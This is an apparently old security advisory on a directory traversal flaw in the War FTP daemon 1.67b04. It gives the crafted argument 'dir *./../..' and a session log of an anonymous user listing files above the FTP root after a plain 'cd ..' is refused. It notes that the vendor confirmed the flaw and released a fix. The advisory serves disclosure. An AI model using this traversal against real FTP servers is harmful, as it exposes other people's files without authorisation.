COMMAND

    Warftp

SYSTEMS AFFECTED

    Warftp 1.67b04

PROBLEM

    'se00020' found following.   By adding a  special formed  argument
    to the  dir command,  it is  possible to  list the /../ directory.
    The command is the following: dir *./../..

        Verbindung mit 10.17.3.44 wurde hergestellt.
        220- Jgaa's Fan Club FTP Service WAR-FTPD 1.67-04 Ready
        220 Please enter your user name.
        Benutzer (10.17.3.44:(none)): anonymous
        331 User name okay. Give your full Email address as password.
        Kennwort:
        230 User logged in, proceed.
        ftp> dir
        200 Port command okay.
        150 Opening ASCII NO-PRINT mode data connection
        for ls -l.
        total 123
        drwxrwxrwx 1 ftp ftp 0 Mar 2 12:17 test
        -rwxrwxrwx 1 ftp ftp 6 Mar 2 12:33 movedtohomedir.txt
        -rwxrwxrwx 1 ftp ftp 11 Mar 2 00:29 bisontest.txt
        drwxrwxrwx 1 ftp ftp 0 Mar 3 15:59 HTTP
        drwxrwxrwx 1 ftp ftp 0 Mar 3 17:05 huhu
        drwxrwxrwx 1 ftp ftp 0 Mar 5 13:42 te
        drwxrwxrwx 1 ftp ftp 0 Mar 5 13:42 ..te
        226 Transfer finished successfully. Data connection closed.
        FTP: 452 Bytes empfangen in 0,02Sekunden
        22,60KB/s
        ftp> cd ..
        550 Permission denied.
        ftp> dir *./../..
        200 Port command okay.
        150 Opening ASCII NO-PRINT mode data connection for ls *./../...
        total 123
        -rwxrwxrwx 1 ftp ftp 251658240 Mar 4 18:42 WIN386.SWP
        drwxrwxrwx 1 ftp ftp 0 Jan 6 20:32 games
        drwxrwxrwx 1 ftp ftp 0 Jan 7 19:58 HalfLife
        ....(cut here)
        ...
        drwxrwxrwx 1 ftp ftp 0 Jan 15 22:36 delphi_zips
        drwxrwxrwx 1 ftp ftp 0 Mar 4 15:00 web
        drwxrwxrwx 1 ftp ftp 0 Mar 4 21:36 WEBS
        226 Transfer finished successfully. Data connection closed.
        FTP: 2977 Bytes empfangen in 0,07Sekunden
        42,53KB/s

SOLUTION

    Author of WarFtp  can confirm that  the problem is  present in War
    FTP Daemon 1.67.04.  After examining the problem, it _looks_  like
    the exploit is  limited to listing  the content one  level up from
    the root-directory.   He was  unable to  access any  of the listed
    files  or  directories.   He  do  however  consider the problem as
    serious and released the fix.